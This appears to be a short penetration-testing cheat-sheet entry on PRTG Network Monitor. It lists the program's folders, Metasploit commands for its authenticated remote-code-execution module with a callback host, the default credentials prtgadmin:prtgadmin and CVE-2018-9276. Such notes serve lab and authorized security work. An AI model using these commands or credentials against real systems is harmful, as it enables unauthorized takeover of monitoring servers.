PRTG Network Monitor
Paessler PRTG is an network monitoring software. On Windows, there are two folders, one for the program, another for the data:
C:\Program Files (x86)\PRTG Network Monitor
C:\ProgramData\Paessler\PRTG Network Monitor
If we have admin access, we can exploit a RCE.
For instance, with metasploit:
$ msfconsole -q
msf6> use windows/http/prtg_authenticated_rce
msf6> set RHOSTS <ip>
msf6> set LHOST tun0
msf6> run # try default password
msf6> set ADMIN_PASSWORD <password>
msf6> run
π» To-do π»
Stuff that I found, but never read/used yet.
- Default credentials (
prtgadmin:prtgadmin) - Nmap (
Indy httpd <version>) -
CVE-2018-9276 (
<18.2.39): command injection (poc)